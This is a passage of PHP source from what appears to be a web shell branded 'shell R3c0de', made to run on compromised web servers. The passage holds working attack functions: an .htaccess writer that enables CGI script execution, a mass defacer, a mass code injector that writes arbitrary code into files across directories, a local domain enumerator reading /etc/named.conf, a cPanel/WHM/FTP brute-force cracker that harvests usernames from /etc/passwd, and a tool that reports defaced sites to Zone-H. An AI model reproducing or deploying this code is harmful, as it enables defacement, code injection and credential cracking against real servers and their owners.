1827. if(!empty($_POST['p3']) && isset($_POST['p3']))
1828. {
1829. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1830. fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
1831. AddType application/x-httpd-cgi .sh
1832. AddHandler cgi-script .pl
1833. AddHandler cgi-script .pl');
1834. fclose($fil);
1835. }
1836. echo "<br><br /><br /></div>";
1837. echo '</div>';
1838. printFooter();
1839.  
1840. }
1841.  
1842. function actionDeface() {
1843. printHeader();
1844. echo "<h1>Mass Defacer by shell R3c0de</h1><div class=content>";
1845. ?>
1846. <form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
1847. <p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
1848. <br>file name : <input type=text name=file size=20 value="index.php">
1849. <br>Text Content : <input type=text name=Contents size=70 value="Add your deface txt here">
1850. <br><input type=submit value="Deface now"></p></form>
1851.  
1852. <?php
1853. if ($_POST['a'] == 'Deface') {
1854. $mainpath = $_POST[p1];
1855. $file = $_POST[p2];
1856. $txtContents = $_POST[p3];
1857. echo "Mass Defacer script by TeaM shell R3c0de XIIX";
1858. $dir = opendir($mainpath); //fixme - cannot deface when change to writeable path!!
1859. while ($row = readdir($dir)) {
1860. $start = @fopen("$row/$file", "w+");
1861. $code = $txtContents;
1862. $finish = @fwrite($start, $code);
1863. if ($finish) {
1864. echo "$row/$file > Done<br><br>";
1865. }
1866. }
1867.  
1868. }
1869. echo '</div>';
1870. printFooter();
1871. }
1872.  
1873. function actionInjector(){
1874. printHeader();
1875. echo '<h1>Mass Code Injector</h1>';
1876. echo '<div class="content">';
1877.  
1878. if(stristr(php_uname(),"Windows")) { $DS = "\\"; } else if(stristr(php_uname(),"Linux")) { $DS = '/'; }
1879. function get_structure($path,$depth) {
1880. global $DS;
1881. $res = array();
1882. if(in_array(0, $depth)) { $res[] = $path; }
1883. if(in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) {
1884. $tmp1 = glob($path.$DS.'*',GLOB_ONLYDIR);
1885. if(in_array(1, $depth)) { $res = array_merge($res,$tmp1); }
1886. }
1887. if(in_array(2, $depth) or in_array(3, $depth)) {
1888. $tmp2 = array();
1889. foreach($tmp1 as $t){
1890. $tp2 = glob($t.$DS.'*',GLOB_ONLYDIR);
1891. $tmp2 = array_merge($tmp2, $tp2);
1892. }
1893. if(in_array(2, $depth)) { $res = array_merge($res,$tmp2); }
1894. }
1895. if(in_array(3, $depth)) {
1896. $tmp3 = array();
1897. foreach($tmp2 as $t){
1898. $tp3 = glob($t.$DS.'*',GLOB_ONLYDIR);
1899. $tmp3 = array_merge($tmp3, $tp3);
1900. }
1901. $res = array_merge($res,$tmp3);
1902. }
1903. return $res;
1904. }
1905.  
1906. if(isset($_POST['submit']) && $_POST['submit']=='Inject') {
1907. $name = $_POST['name'] ? $_POST['name'] : '*';
1908. $type = $_POST['type'] ? $_POST['type'] : 'html';
1909. $path = $_POST['path'] ? $_POST['path'] : getcwd();
1910. $code = $_POST['code'] ? $_POST['code'] : 'Pakistan Haxors Crew';
1911. $mode = $_POST['mode'] ? $_POST['mode'] : 'a';
1912. $depth = sizeof($_POST['depth']) ? $_POST['depth'] : array('0');
1913. $dt = get_structure($path,$depth);
1914. foreach ($dt as $d) {
1915. if($mode == 'a') {
1916. if(file_put_contents($d.$DS.$name.'.'.$type, $code, FILE_APPEND)) {
1917. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
1918. } else {
1919. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
1920. }
1921. } else {
1922. if(file_put_contents($d.$DS.$name.'.'.$type, $code)) {
1923. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
1924. } else {
1925. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
1926. }
1927. }
1928. }
1929. } else {
1930. echo '<form method="post" action="">
1931. <table align="center">
1932. <tr>
1933. <td>Directory : </td>
1934. <td><input class="box" name="path" value="'.getcwd().'" size="50"/></td>
1935. </tr>
1936. <tr>
1937. <td class="title">Mode : </td>
1938. <td>
1939. <select style="width: 100px;" name="mode" class="box">
1940. <option value="a">Apender</option>
1941. <option value="w">Overwriter</option>
1942. </select>
1943. </td>
1944. </tr>
1945. <tr>
1946. <td class="title">File Name & Type : </td>
1947. <td>
1948. <input type="text" style="width: 100px;" name="name" value="*"/>&nbsp;&nbsp;
1949. <select style="width: 100px;" name="type" class="box">
1950. <option value="html">HTML</option>
1951. <option value="htm">HTM</option>
1952. <option value="php" selected="selected">PHP</option>
1953. <option value="asp">ASP</option>
1954. <option value="aspx">ASPX</option>
1955. <option value="xml">XML</option>
1956. <option value="txt">TXT</option>
1957. </select></td>
1958. </tr>
1959. <tr>
1960. <td class="title">Code Inject Depth : </td>
1961. <td>
1962. <input type="checkbox" name="depth[]" value="0" checked="checked"/>&nbsp;0&nbsp;&nbsp;
1963. <input type="checkbox" name="depth[]" value="1"/>&nbsp;1&nbsp;&nbsp;
1964. <input type="checkbox" name="depth[]" value="2"/>&nbsp;2&nbsp;&nbsp;
1965. <input type="checkbox" name="depth[]" value="3"/>&nbsp;3
1966. </td>
1967. </tr>
1968. <tr>
1969. <td colspan="2"><textarea name="code" cols="70" rows="10" class="box"></textarea></td>
1970. </tr>
1971. <tr>
1972. <td colspan="2" style="text-align: center;">
1973. <input type="hidden" name="a" value="Injector">
1974. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
1975. <input type="hidden" name="p1">
1976. <input type="hidden" name="p2">
1977. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1978. <input style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
1979. </tr>
1980. </table>
1981. </form>';
1982. }
1983. echo '</div>';
1984. printFooter();
1985. }
1986.  
1987. function actionDomain() {
1988. printHeader();
1989. echo '<h1>Local Domains</h1><div class=content>';
1990. $file = @implode(@file("/etc/named.conf"));
1991. if (!$file) {
1992. die("# Can't Read [/etc/named.conf] ... Sorry ! :( ");
1993. }
1994. preg_match_all("#named/(.*?).db#", $file, $r);
1995. $domains = array_unique($r[1]);
1996. //check();
1997. //if(isset($_GET['ShowAll']))
1998. {
1999. echo "<table align=center border=1 width=59% cellpadding=5>
2000. <tr><td colspan=2>[#] There are : [ <b>" . count($domains) . "</b> ] Domain(s) on this box ... * I Suggest That You Should Pwn it ;) :D*</td></tr>
2001. <tr><td>Domain</td><td>User</td></tr>";
2002. foreach ($domains as $domain) {
2003. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
2004. echo "<tr><td>$domain</td><td>" . $user['name'] . "</td></tr>";
2005. }
2006. echo "</table>";
2007. }
2008. echo '</div>';
2009. printFooter();
2010. }
2011. function actionCpanel() {
2012. printHeader();
2013. echo '<h1>cPanel Cracker</h1>';
2014. echo '<div class="content">';
2015. echo '<table align=center class="main" border="0"><tr bgcolor="#5e5e5e"><td>Users</td><td></td><td>Selected Users</td><td>Password</td></tr>';
2016. echo '<tr><td><textarea rows="20" name="S1" cols="33"></textarea></td>';
2017. echo '<td><input type="button" name="cpad1" value=">" class="cpb"/><br /><br /><input type="button" name="cpadall" value=">>" class="cpb"/><br /><br />';
2018. echo '<input type="button" name="cprm1" value="<" class="cpb"/><br /><br /><input type="button" name="cprmall" value="<<" class="cpb"/></td>';
2019. echo '<td><textarea rows="20" name="users" cols="33"></textarea></td>';
2020. echo '<td><textarea rows="20" name="passwords" cols="33"></textarea></td>';
2021. echo '</tr>';
2022. echo '<tr><td><input style="width:252px;" type="button" onclick="g(\'Cpanel\',null,\'grbetcpw\')" value="Grab usernames from /etc/passwd"/><br /><input style="margin-top:5px;width:252px;" type="button" onclick="g(\'Cpanel\',null,\'grbhome\')" value="Grab usernames from /home"/></td><td></td>';
2023. echo '<td colspan="2"><span>Crack options:&nbsp;&nbsp;&nbsp;</span><input name="cracktype" value="cpanel" checked type="radio"><b>Cpanel(2082)</b>&nbsp;&nbsp;<input name="cracktype" value="whm" type="radio"><b>WHM(2087)</b>&nbsp;&nbsp;<input name="cracktype" value="ftp" type="radio"><b>Ftp(21)</b><br />
2024. <div style="margin-top:5px;"><span>Timeout delay:&nbsp;&nbsp;</span><input type="text" name="connect_timeout" size="4" value=""/>&nbsp;&nbsp;
2025. <input type="checkbox" name="bruteforce" value="true"/>&nbsp;<span>Bruteforce</span>&nbsp;
2026. <select name="charset">
2027. <option value="all">All Letters + Numbers</option>
2028. <option value="numeric">Numbers</option>
2029. <option value="letters">Letters</option>
2030. <option value="symbols">Symbols</option>
2031. <option value="lowercase">Lower Letters</option>
2032. <option value="uppercase">Higher Letters</option>
2033. <option value="lowernumeric">Lower Letters + Numbers</option>
2034. <option value="uppernumeric">Upper Letters + Numbers</option>
2035. <option value="lowersymbols">Lower Letters + Symbols</option>
2036. <option value="uppersymbols">Upper Letters + Symbols</option>
2037. <option value="letterssymbols">All Letters + Symbols</option>
2038. <option value="numberssymbols">Numbers + Symbols</option>
2039. <option value="lowernumericsymbols">Lower Letters + Numbers + Symbols</option>
2040. <option value="uppernumericsymbols">Upper Letters + Numbers + Symbols</option>
2041. <option value="lettersnumericsymbols">All Letters + Numbers + Symbols</option>
2042. </select></div>
2043. <div style="margin-top:5px;"><span>Min Bruteforce Length:&nbsp;&nbsp;</span><input type="text" name="min_length" size="5" value=""/>&nbsp;&nbsp;&nbsp;&nbsp;<span>Max Bruteforce Length:&nbsp;&nbsp;</span><input type="text" name="max_length" size="5" value=""/></div>
2044. <div style="margin-top:5px;text-align:center"><input type="submit" value="Crack Now" name="submit" style="font-weight: bold;"/></div>
2045. </td></tr>';
2046. echo '</table>';
2047. echo '</div>';
2048. printFooter();
2049. }
2050. function actionZHposter(){
2051. printHeader();
2052. echo '<h1>Zone-H Notifier</h1><div class=content>';
2053.  
2054. echo '<form action="" method="post" onSubmit=da2(null,null,this.p1.value,this.p2.value,this.p3.value,this.p4.value);return true;">
2055. <input type="text" name="p1" size="40" value="shell R3c0de" /></br>
2056. <select name="p2">
2057. <option >--------SELECT--------</option>
2058. <option value="1">known vulnerability (i.e. unpatched system)</option>
2059. <option value="2" >undisclosed (new) vulnerability</option>
2060. <option value="3" >configuration / admin. mistake</option>
2061. <option value="4" >brute force attack</option>
2062. <option value="5" >social engineering</option>
2063. <option value="6" >Web Server intrusion</option>
2064. <option value="7" >Web Server external module intrusion</option>
2065. <option value="8" >Mail Server intrusion</option>
2066. <option value="9" >FTP Server intrusion</option>
2067. <option value="10" >SSH Server intrusion</option>
2068. <option value="11" >Telnet Server intrusion</option>
2069. <option value="12" >RPC Server intrusion</option>
2070. <option value="13" >Shares misconfiguration</option>
2071. <option value="14" >Other Server intrusion</option>
2072. <option value="15" >SQL Injection</option>
2073. <option value="16" >URL Poisoning</option>
2074. <option value="17" >File Inclusion</option>
2075. <option value="18" >Other Web Application bug</option>
2076. <option value="19" >Remote administrative panel access bruteforcing</option>
2077. <option value="20" >Remote administrative panel access password guessing</option>
2078. <option value="21" >Remote administrative panel access social engineering</option>
2079. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
2080. <option value="23" >Access credentials through Man In the Middle attack</option>
2081. <option value="24" >Remote service password guessing</option>
2082. <option value="25" >Remote service password bruteforce</option>
2083. <option value="26" >Rerouting after attacking the Firewall</option>
2084. <option value="27" >Rerouting after attacking the Router</option>
2085. <option value="28" >DNS attack through social engineering</option>
2086. <option value="29" >DNS attack through cache poisoning</option>
2087. <option value="30" >Not available</option>
2088. </select>
2089. </br>
2090. <select name="p3">
2091. <option >--------SELECT--------</option>
2092. <option value="1" >Heh...just for fun!</option>
2093. <option value="2" >Revenge against that website</option>
2094. <option value="3" >Political reasons</option>
2095. <option value="4" >As a challenge</option>
2096. <option value="5" >I just want to be the best defacer</option>
2097. <option value="6" >Patriotism</option>
2098. <option value="7" >Not available</option>
2099. </select>
2100. </br>
2101. <textarea name="p4" cols="44" rows="9">List Of Domains</textarea>
2102. <input type="submit" value="Send Now !" />
2103. </form>';
2104. echo "</td></tr></table></form>";
2105.  
2106. if($_POST['a'] == 'ZHposter')
2107. {
2108. ob_start();
2109. $sub = @get_loaded_extensions();
2110. if(!in_array("curl", $sub))
2111. {
2112. die('[-] Curl Is Not Supported !! ');
2113. }
2114.  
2115. $hacker9 = $_POST['p1'];
2116. $method9 = $_POST['p2'];
2117. $neden9 = $_POST['p3'];
2118. $site9 = $_POST['p4'];
2119.  
2120. if (empty($hacker9))
2121. {
2122. die ("[#] You Must Fill In The Attacker Name !");
2123. }
2124. elseif($method9 == "--------SELECT--------")
2125. {
2126. die("[#] You Must Select The Method !");
2127. }
2128. elseif($neden9 == "--------SELECT--------")
2129. {
2130. die("[#] You Must Select The Reason");
2131. }
2132. elseif(empty($site9))
2133. {
2134. die("[#] You Must Enter the Sites List ! ");
2135. }
2136.  
2137. $i = 0;
2138. $sites = explode("\n", $site9);
2139. while($i < count($sites))
2140. {
2141.  
2142. if(substr($sites[$i], 0, 4) != "http")
2143. {
2144. $sites[$i] = "http://".$sites[$i];
2145. }
2146. ZoneH("http://zone-h.org/notify/single", $hacker9, $method9, $neden9, $sites[$i]);
2147. echo "Site : ".$sites[$i]." Defaced ! </br>";
2148. ++$i;
2149. }
2150. echo "[#] Sites Sent To Zone-H :D !! ";
2151. }
2152. echo '</div>';
2153. printFooter();
2154. }
2155. if( empty($_POST['a']) )
2156. if(isset($default_action) && function_exists('action' . $default_action))
2157. $_POST['a'] = $default_action;
2158. else
2159. $_POST['a'] = 'SecInfo';
2160. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
2161. call_user_func('action' . $_POST['a'])
2162.  
2163. ?>